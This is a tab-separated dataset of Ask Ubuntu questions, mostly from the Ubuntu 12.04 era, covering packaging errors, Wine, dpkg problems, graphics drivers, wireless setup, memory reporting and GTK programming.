154534	quickly package command fails	i get an error when trying to package my quickly application : $ quickly package ... ... ..ubuntu packaging created in debian/ ... ... ... ... an error has occurred during package building error : package command failed aborting it does n't really give me an indication of what went wrong . it used to work before . if you need to take a look at the code : lp : ~koukin/+junk/unity-bookmarks
154536	install a mirror without downloading all packages from official repository	i first gon na explain the situation : i have a laptop which is connected to a wifi connection , and a desktop which can not be connected to internet ( the modem is too far from it ) , and i want to install some software on the last one . ( the two pcs are running ubuntu 12.04 , and are connected with an ethernet cable ) i 've already searched for a solution , but all i 've found was the use of some softwares that should have been already installed on the `` internet-less pc '' . ( keryx , aptoncd ... ) what i want to do is to create a mirror in my laptop which contain the packages i have in this one ( situated in /var/cache/apt/archive ) and i do n't want to download all the packages from the official repository , i actually do n't need them . can someone tell me if it is possible to do that ? thanks ,
154545	why wo n't kochcurve.exe run on wine ?	i have simple program kochcurve.exe . it is a dos based program which asks for some input and displays the koch curve while executed in windows . on ubuntu i installed wine and also configured using wineconfig . i have set the permissions for `` allow executing file as program '' . when i run this .exe it shows dos like window for a while and gets suddenly closed . help please .
154548	how to write audio track information to the file , using banshee	as the title suggests , when i change audio track information ( metadata ) in banshee i want it to be stored to the file and i ca n't figure out how to do it . maybe this can not be achieved in banshee problem when i copy audio files to other devices ( like a smart phone ) in does not retain the metadata changes i applied in banshee . i am assuming there is some hidden database in ~/home that stores this data . is there away i can do this in banshee or do i need to download some other software package . the primary purpose of this question is to understand how it can be done in banshee . i am not looking for a list of alternative software music taggers unless the definitive answer is no . thanks
154552	installing dropbox fails at 99 % , causing dpkg errors ... how do i fix ?	i 've run a script ( ubuntu-12.04-postinstall.py ) that auto-installs suggested programs . all of it worked fine until it tried to install dropbox . it got to 99 % and froze for quite a while . so , i closed the terminal and rebooted . now whenever i try to use apt-get install , it gives this error : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem '' i did this and eventually was able to install software but then it tried to install dropbox again automatically and still got stuck at 99 % . how can i get this cleared from dpkg ? i really do n't want to have to run through hoops every time just to install new software ! in case this matters , this is a lubuntu system . i 'd strongly prefer not to reinstall lubuntu as it was a pain to install originally ; i had installed a horrible copy of the distro , and it took over 15 hours to fix and install . edit : ran this to check what might be going on . sudo dpkg -- configure -a -- dry-run got back : [ pastebin ] http : //paste.ubuntu.com/1055407/ how can i just clear this out ?
154555	is there a good alternative to libreoffice ?	hello i do n't like libreoffice so much , in my opinion it 's too slow . is there a nice alternative ?
154557	unable to change brightness settings in sony vaio e series laptop	i am using sony vaio e series vpceh25en laptop . i installed ubuntu 12.04 64 bit version and i could n't change my brightness level . always it is showing max brightness , i tried to change by using echo 0 | sudo tee /sys/class/backlight/acpi_video0/brightness command . when i run the above cmd it showing output as 0 but there is no change in brightness level . please help out how to change brightness levels .
154558	how to create python app , which asks for sudo permissions ?	my application needs sudo permissions , so i want that when program starts , it asks for sudo permission , like software center does , when something will be installed . i`m using python and gtk+ .
154560	disable unity sidebar but still use dash with superkey	is there a way to disable the unity sidebar but still use the dash ?
154564	what is my real available disk space ?	i 've got a low disk space message window of 99.9 mb disk space remaining . when i went to the ubuntu system monitor it was saying on the system tab : system status available disk space : 49.4 mib . the system status on the system tab does n't seem to change even if i delete stuff from the disk .
154565	how to install ubuntu from within other linux distributions without reboot	i have an opensuse linux running on my work pc . i have no time to go offline and install ubuntu . ideally i want to mount ubuntu.iso , run ubuntu installer from bash , and then , at the evening , just reboot , select ubuntu from grub , and decide whether i stay with it . is that possible ?
154566	how do i get a page preview in focuswriter ?	how do i get a page preview in focuswriter ? i need to check if tables and pages are formated well .
154570	sound card problem , audio 2 dj . snd-usb-caiaq log : unable to find an output urb to use	i 'm running ubuntu 12.04 and have a native instruments audio 2 dj sound card . when i listen to music or watch a video , sound disappears ( video stops then too ) and i have to plug out and plug in the soundcard to have sound again . the message i managed to find is snd-usb-caiaq log : unable to find an output urb to use
154576	ltsp problem with old cpu client	i want to setup ltsp with 12.04 , but i have a problem with some clients . when i try to boot them , fail with a reference to cmov and cx8 support in the cpu . after some investigation , i discover that ubuntu dropped support on non i686 cpu since 10.10 . so i 'm needing a ltsp client 10.04 or older . when i issue the command : ltsp-build-client -- dist lucid -- arch i386 it fails when start processing `` /var/cache/apt/archives/ltsp-client-core_5.2.1-0ubuntu9_i386.deb '' if i try to process this package alone inside the chroot it gives more info , something like `` ltsp-client can not be installed in a regular machine '' ... it seems to me a bug in ltsp-build-client process of building the client ... anyone with the same problem ? any help ? ideas ? thank you all !
154577	what is a linux equivalent to pkzip or winzip or the gui version of 7zip ?	gui-based applications like pkzip and winzip ( and the gui version of 7z/7zip ) let us browse around our directories and create a compressed file that contains lots of different directories and files , complete with [ partial or full ] paths . what is the equivalent on ubuntu linux ( specifically , 64-bit ubuntu 12.04 ) ?
154581	how to stop ctrl + a moving cursor to beginning of line everywhere ?	ctrl + a moving cursor to beginning of line everywhere i know that ctrl+a should move the cursor to the beginning of the line in terminal , but problem is it 's doing it everywhere . address bar , text editors everywhere . i have just installed 12.04 and this is really annoying . do i have to uninstall anything , because i remember this problem was not there initially . i have installed lamp and a few other applications but i do n't think that will be causing this . please help ...
154588	why does unity occasionally cause system to stop responding ?	i had a virtualbox ( windows 7 ) , ubuntu was the host os , window open , i had chrome in ubuntu open with slacker playing music open , i had thunderbird mail open , and tickr running news across the bottom -- and then everything came to a crawl . the music kept repeating 2-second clips over and over again , the tickr app started stopping and starting , etc . i tried closing windows , nothing helped . in fact , it looked like chrome was unclosable . then , i remembered something i learned during the beta -- you could restart unity from the command prompt ( ctrl+alt+f1 login ) , by running `` unity -- reset '' ( then i think it was ctrl+alt+f7 to return to window manager ) , i did this , and my system became responsive again after unity restarted , music started playing again , tickr started running smoothly , and the windows 7 virtual machine was responding normally.. so , can someone tell me , why does unity occasionally ( not too often ) cause my system become unresponsive ? i realize this could be the fault of compiz or unity , but restarting ( resetting ) unity seemed to be the trick to fixing it .
154591	localhost login after installation	i recently installed ubuntu 12.04 on my computer with a usb stick cause i do n't have a cd drive . the normal iso did n't work , so i used the text installer and completed all the steps somehow . eventually it showed `` finishing installation '' and rebooted and i was met with a prompt saying `` localhost login tty1 '' or something . i searched some old forums and tried out the login and password as root , guest , ubuntu etc but all in vain . i used the rescue mode and tried to install ubuntu-desktop with : sudo apt-get install ubuntu-desktop it says it is not installed and attempts to install . so i think i found the problem . the desktop is not istalled . but when i run this command it says it wants some disk space . i press enter and then it asks to insert the ubuntu cd in /media/cdrom/ and press enter again . but as i told , i do n't have a cd drive , so can anyone help me out ?
154594	is there any way to see overall ubuntu one sync progress ?	i am very surprised to find that the u1 client only shows me `` file sync in progress '' . i can see the current transfers and files still to be transferred ( in an uninformative flat list ) with u1sdtool -- current-transfers and u1sdtool -- waiting but neither of these give a % completed or time estimate based on current transfer speed . i seem to recall that this feature existed in much earlier version of the u1 client .
154601	how to disable gimp 2.8 splash screen ?	since i do n't really like any splash screen and i did n't find such info for gimp , how can i disable the gimp version 2.8 splash screen ?
154604	why do i have updates available when i just ran 'apt-get update ' and 'apt-get upgrade ' ?	i logged in this morning and had a notification of 25 available updates . i ran apt-get update and apt-get upgrade , and now just having finished the upgrade , i immediately get a notification of additional 8 available updates . i guess there 's a difference in where apt-get update and the notifications utility get their information from ? please help me sort this out .
154605	how do i commit changes to a text file on button press ?	i 've written a small app that creates a gui for setting up ushare . currently it depends heavily on the 'w ' ( write ) and 'a ' ( append ) functions to generate/edit ushare.conf file . but i 've been trying to find a way for the app to store all the changes until a save button is pressed , and only then committing them to the actual file . i think that would be the best way of getting around having the user press enter every time they change any field ( and indeed allow for gtkcheckbutton ) .
154611	wireless networking with linksys router wrt310n v.2 in 12.04	i just installed ubuntu precise pangolin 12.04 yesterday . i 'm very excited about the change ! i 've been using windows since i was 16 years old . i 'm now 29 ... . now , to business . i 'm having trouble establishing a functional wireless connection with my current router ( wrt310n ) and the linksys wireless- g network adapter ( wusb54g v.4 ) . often times the network manager will even tell me that i have established a connection , but it wo n't get me on-line . i was wondering if i should just fork out the money to buy a router that i 'm sure is linux compatible or should i try to fix this ? here is an ifconfig : brettnruth @ supaflyv : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:19 : d1:18:69:6f inet addr:192.168.1.101 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :219 : d1ff : fe18:696f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1419 errors:0 dropped:0 overruns:0 frame:0 tx packets:1396 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1348283 ( 1.3 mb ) tx bytes:160713 ( 160.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:400 errors:0 dropped:0 overruns:0 frame:0 tx packets:400 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:35403 ( 35.4 kb ) tx bytes:35403 ( 35.4 kb ) wlan0 link encap : ethernet hwaddr 00:18 : f8 : ad:01:2d inet addr:10.42.0.1 bcast:10.42.0.255 mask:255.255.255.0 inet6 addr : fe80 : :218 : f8ff : fead:12d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:55 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:10477 ( 10.4 kb )
154613	get child elements of a notebook	i have a notebook element and textview elements inside them . because the pages on the notebook will be constantly switched between . i need to be able to have in a variable the currently selected textview 's buffer . how would i do this ?
154615	error while running quickly	getting an error while running quickly app : creating project directory sata creating bzr repository and committing launching your newly created project ! ( sata:2701 ) : glib-gio-error ** : settings schema 'org.gnome.desktop.interface ' is not installed congrats , your new project is setup ! cd /home/blacksaint/sata/ to start hacking . actually after this the app should pop - up but it really does n't do so !
154617	what text do i have to put in mc 's file find text field `` content : '' ?	midnight commander 3.4.8.1 > file find . what text do i have to put in the âťcontent : âť text field and in the other fields ? i tried several settings in the other fields but mc always returned no result . ( this is not explained in 'man mc ' . ) my hope is to perform some grep-like action using mc . http : //svn.dd-wrt.com:8000/browser//src/router/mc2/src/filemanager/find.c did not enlighten me .
154618	ubuntu 12.04 only detects one out of two monitors and mirrors them both	i have ubuntu 12.04 installed with a vga splitter creating dual monitors . however when using ubuntu 12.04 with the vga splitter the two monitors are mirrored and when going to the `` displays '' settings the is only one monitor which is detected and when `` detect displays '' nothings happens . this is what `` details '' name my computer . different to what windows say ... graphics = gallium 0.4 on llvmpipe ( llvm 0x300 ) cpu = intel速 celeron ( r ) d cpu 3.33ghz ram = 1.4 gib os type : 64-bit
154622	embed .avi video from file in powerpoint 2010 ( under wine )	i 've been using office 2010 with ubuntu 12.04 . i would like to embed an video ( .avi format ) into a .pptx file in powerpoint . it was originally a .mov file , so i used avconv to convert the .mov file to a .avi file : avconv -i input.mov -vcodec libx264 -crf 22 ouput.avi this works fine . but , when i try and embed output.avi into powerpoint 2010 , i get the following error : powerpoint can not insert a video from the selected file . verify the necessary codec for this media is installed , and try again . do you have any suggestions on how to install the necessary codecs ( in wine ? ) or embed the video in my powerpoint ? thanks
154623	while browsing , why does my pc suddenly connect to sites using upper port numbers and unknown services ?	hello i 'm a newbie ; a while ago i was browsing thenation.com and then i noticed on the firestarter status tab that i was connected to three hosts 91.189.92.191/176/181 on ports 44441 and 51501 ( unknown services ) . previously i only see http or https on 80 , 88 , and 443 when browsing . is this something that i should worry about ? i use firefox with anonymox on oneiric .
154635	wine does n't work ( problem with the mount manager )	i did n't know exactly when the problem occurred . my wine worked well a couple days ago . then , i was just about to install some windows programs hours ago but i got nothing . no installer window showed up , and no error report . it just wo n't work . and now i just found where the problem is ( screenshot below ) , but i do n't know how to fix it . any idea ? any help would be appreciated . thanks in advance . details : wine 1.4 ubuntu 12.04 lts i tried : autoremove in terminal delete the software configuration
154637	drivers for nvidia 520m not working	i know this is nominally a duplicate question , but i 've read the other questions and have n't been able to fix my problem after many hours and attempts , so please do n't delete it . also , it seems like answers to other questions are dependent on certain situations . my situation being different from the others i found represented , here 's my question . recently , i had ubuntu 12.04 installed with wubi , and it ran ok , though slowly and with occasional hangs . so i partitioned the drive and installed 12.04 in its own partition . now when i start it , i am stuck using 2d . i believe this is an nvidia bug . my nvidia card is a gt 520m and my machine has optimus . additional drivers only displays my wireless driver . going to system settings > > details > > graphics shows driver : unknown , experience : standard . i downloaded the driver from the nvidia website , and ran the installer with no errors , except that the `` distribution-provided pre-install script failed '' . rebooted and my screen was stuck at 640x480 , which was fixed by editing /etc/x11/xorg.conf however , i still was stuck in 2d , and nothing else had changed either . a thread suggested bumblebee . i tried that , and when i ran optirun firefoxi got a frozen blank screen . after another suggestion , i checked the bios to try and disable optimus . i found and ran myriad other commands to try and fix the problem with no change . i 've just done a clean re-install of ubuntu . from there , i : installed all the updates downloaded the nvidia driver installed it got screen stuck at 640x480 , fixed in xorg.conf . recap : i ca n't get the nvidia drivers working i am stuck using 2d i 'm an idiot i think if the first one is solved , the second will naturally follow . if you need me to provide any other information , i 'd be happy to . from what i 've seen in other threads , i think this information may help : lsmod : dh @ donsmachine : ~ $ lsmod module size used by nvidia 12353161 0 snd_hda_codec_hdmi 32474 1 snd_hda_codec_realtek 223867 1 joydev 17693 0 parport_pc 32866 0 ppdev 17113 0 rfcomm 47604 0 bnep 18281 2 bluetooth 180104 10 rfcomm , bnep snd_hda_intel 33773 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec uvcvideo 72627 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event lib80211_crypt_tkip 17390 0 wl 2568210 0 lib80211 14381 2 lib80211_crypt_tkip , wl snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78855 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 87692 0 serio_raw 13211 0 i915 468745 2 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm drm_kms_helper 46978 1 i915 drm 242038 3 i915 , drm_kms_helper mei 41616 0 i2c_algo_bit 13423 1 i915 mxm_wmi 12979 0 acer_wmi 28418 0 sparse_keymap 13890 1 acer_wmi video 19596 1 i915 wmi 19256 2 mxm_wmi , acer_wmi mac_hid 13253 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp tg3 152032 0 sdhci_pci 18826 0 sdhci 33205 1 sdhci_pci lspci -nn | grep vga dh @ donsmachine : ~ $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:0df7 ] ( rev a1 ) lshw dh @ donsmachine : ~ $ sudo lshw [ sudo ] password for dh : donsmachine description : notebook product : easynote ts44hr ( ) vendor : packard bell version : v1.12 serial : lxbwz02017134209d71601 width : 64 bits capabilities : smbios-2.7 dmi-2.7 vsyscall32 configuration : boot=normal chassis=notebook uuid=16fe576b-ca15-11e0-b096-b870f4e51243 *-core description : motherboard product : sjv50_hr vendor : packard bell physical id : 0 version : base board version serial : base board serial number slot : base board chassis location *-firmware description : bios vendor : packard bell physical id : 0 version : v1.12 date : 07/11/2011 size : 1mib capacity : 2496kib capabilities : pci upgrade shadowing cdboot bootselect edd int13floppynec int13floppytoshiba int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int9keyboard int10video acpi usb biosbootspecification *-memory description : system memory physical id : 1b slot : system board or motherboard size : 4gib *-bank:0 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : nt2gc64b88b0ns-cg vendor : nanya technology physical id : 0 serial : 598e126e slot : channela-dimm0 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : dimm [ empty ] physical id : 1 slot : channela-dimm1 *-bank:2 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : nt2gc64b88b0ns-cg vendor : nanya technology physical id : 2 serial : 159e126c slot : channelb-dimm0 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:3 description : dimm [ empty ] physical id : 3 slot : channelb-dimm1 *-cpu description : cpu product : intel ( r ) core ( tm ) i3-2330m cpu @ 2.20ghz vendor : intel corp. physical id : 2e bus info : cpu @ 0 version : intel ( r ) core ( tm ) i3-2330m cpu @ 2.20ghz slot : cpu1 size : 2ghz capacity : 4ghz width : 64 bits clock : 1333mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm arat epb xsaveopt pln pts tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=2 enabledcores=2 threads=4 *-cache:0 description : l1 cache physical id : 30 slot : l1 cache size : 32kib capacity : 32kib capabilities : synchronous internal write-through instruction *-cache:1 description : l2 cache physical id : 31 slot : l2 cache size : 256kib capacity : 256kib capabilities : synchronous internal write-through unified *-cache:2 description : l3 cache physical id : 32 slot : l3 cache size : 3mib capacity : 3mib capabilities : synchronous internal write-through unified *-cache description : l1 cache physical id : 2f slot : l1 cache size : 32kib capacity : 32kib capabilities : synchronous internal write-through data *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-pci:0 description : pci bridge product : xeon e3-1200/2nd generation core processor family pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:2000 ( size=4096 ) memory : d0000000-d10fffff ioport : a0000000 ( size=301989888 ) *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : d0000000-d0ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:2000 ( size=128 ) memory : d1000000-d107ffff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory : d1400000-d17fffff memory : c0000000-cfffffff ioport:3000 ( size=64 ) *-communication description : communication controller product : 6 series/c200 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei latency=0 resources : irq:42 memory : d1a04000-d1a0400f *-usb:0 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory : d1a0a000-d1a0a3ff *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:44 memory : d1a00000-d1a03fff *-pci:1 description : pci bridge product : 6 series/c200 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : b4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 memory:9fb00000-9fbfffff ioport : d1800000 ( size=1048576 ) *-network description : ethernet interface product : netlink bcm57785 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : b8:70 : f4 : e5:12:43 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 firmware=sb latency=0 link=no multicast=yes port=twisted pair resources : irq:16 memory : d1830000-d183ffff memory : d1840000-d184ffff memory : d1850000-d18507ff *-generic:0 description : sd host controller product : netxtreme bcm57765 memory card reader vendor : broadcom corporation physical id : 0.1 bus info : pci @ 0000:02:00.1 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=sdhci-pci latency=0 resources : irq:17 memory : d1800000-d180ffff *-generic:1 unclaimed description : system peripheral product : broadcom corporation vendor : broadcom corporation physical id : 0.2 bus info : pci @ 0000:02:00.2 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d1810000-d181ffff *-generic:2 unclaimed description : system peripheral product : broadcom corporation vendor : broadcom corporation physical id : 0.3 bus info : pci @ 0000:02:00.3 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d1820000-d182ffff *-pci:2 description : pci bridge product : 6 series/c200 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : b4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 memory : d1900000-d19fffff *-network description : wireless interface product : bcm43225 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : 68 : a3 : c4:44:81:96 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 ip=192.168.0.12 latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d1900000-d1903fff *-usb:1 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : d1a09000-d1a093ff *-isa description : isa bridge product : hm65 express chipset family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 6 series/c200 series chipset family 6 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 logical name : scsi1 version : 04 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:41 ioport:3098 ( size=8 ) ioport:30bc ( size=4 ) ioport:3090 ( size=8 ) ioport:30b8 ( size=4 ) ioport:3060 ( size=32 ) memory : d1a08000-d1a087ff *-disk description : ata disk product : st9500325as vendor : seagate physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 0001 serial : s2w1amsx size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=a45f21e9 *-volume:0 description : windows ntfs volume physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 3.1 serial : 46aa-2a25 size : 19gib capacity : 20gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2011-08-25 21:32:00 filesystem=ntfs label=pqservice state=clean *-volume:1 description : windows ntfs volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 3.1 serial : 10aa-ad1a size : 98mib capacity : 100mib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2011-08-25 21:32:03 filesystem=ntfs label=system reserved state=clean *-volume:2 description : windows ntfs volume physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 version : 3.1 serial : 668c5afc-182e-ff4b-b084-3cc09f54972d size : 395gib capacity : 395gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2011-08-25 21:32:03 filesystem=ntfs label=don 's machine state=clean *-volume:3 description : extended partition physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 size : 49gib capacity : 49gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 3945mib capabilities : nofs *-logicalvolume:1 description : linux filesystem partition physical id : 6 logical name : /dev/sda6 logical name : / capacity : 46gib configuration : mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , user_xattr , barrier=1 , data=ordered state=mounted *-cdrom description : dvd-ram writer product : dvd-rw dvrtd11rs vendor : pioneer physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.01 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-serial unclaimed description : smbus product : 6 series/c200 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : d1a06000-d1a060ff ioport:3040 ( size=32 ) *-power unclaimed description : oem_define1 product : oem_define5 vendor : oem_define2 physical id : 1 version : oem_define6 serial : oem_define3 capacity : 75mwh *-battery description : lithium ion battery product : crb battery 0 vendor : -virtual battery 0- physical id : 2 version : 10/12/2007 serial : battery 0 slot : fake update : per comment , installed bumblebee . am rebooting now to see if that helped . finished rebooting - no change . update : @ constantin : bios lists two options : `` switchable '' & `` integrated '' . tried them both , no go . i tried the directions you linked to - there is no change . nvidia-xconfig and nvidia-settings : done , done , and redone . no change . also worth noting i 've since reverted all changes made following the instructions at that link .
154638	how to get mobile broadband modem ( zte k3370-z ) work ?	i am a die hard ubuntu user . few days back i installed 12.04 and purchased a vodafone modem ( zte k3770-z ) . when i try to make a mobile connection , i am able to connect to the network as indicated by the symbol on the top and constant light of the modem . but i am not able to access any websites , software centre , etc . please help me .
154640	how to add an alias to a command in terminal ?	by typing a manually specified command in terminal i want to do some . how could add an alias to a command ? can i do that with the help of the terminal or should i edit some kind of file ?
154649	command line tool for smush.it ?	is there a command line tool for the smush.it webservice ? i know there is a jar that you can download . but i 'm looking for something i can just install with the ubuntu package manager , aptitude .
154655	why do n't the % mem values in top add up to the total used memory ?	i 'm currently debugging performance issues with my vps and for that i 'm trying to understand which of the processes eat the most memory . reading top , here 's what i get : mem : 366544k total , 321396k used , 45148k free , 380k buffers swap : 1048572k total , 592388k used , 456184k free , 7756k cached pid user pr ni virt res shr s % cpu % mem time+ command 12339 ruby 20 0 844m 74m 2440 s 0 20.8 0:24.84 ruby 12363 ruby 20 0 844m 73m 1576 s 0 20.6 0:00.26 ruby 21117 ruby 20 0 171m 33m 1792 s 0 9.3 2:03.98 ruby 11846 ruby 20 0 858m 21m 1820 s 0 6.0 0:09.15 ruby 21277 ruby 20 0 219m 11m 1648 s 0 3.2 2:00.98 ruby 792 root 20 0 266m 10m 1024 s 0 3.0 1:40.06 ruby 532 mysql 20 0 234m 4760 1040 s 0 1.3 0:41.58 mysqld 793 root 20 0 250m 4616 984 s 0 1.3 1:20.55 ruby 586 root 20 0 156m 4532 848 s 0 1.2 6:17.10 god 12315 ruby 20 0 175m 2412 1900 s 0 0.7 0:07.55 ruby 3844 root 20 0 44036 2132 1028 s 0 0.6 1:08.22 ruby 10939 ruby 20 0 179m 1884 1724 s 0 0.5 0:08.33 ruby 4660 ruby 20 0 229m 1592 1440 s 0 0.4 2:55.46 ruby 3879 nobody 20 0 37428 964 520 s 0 0.3 0:01.99 nginx as you can see my memory is about 90 % used ( which is my issue ) but when you add up the % mem values , it goes to about 50-60 % only . same thing , res does n't add up to ~350mb . why ? am i misunderstanding their meaning ? thanks
154657	how to keep text within gtk cellrenderers at center ?	hello i am using gtk3 cellrenderers in my project , but i want to put text within that at center , how will i do that ?
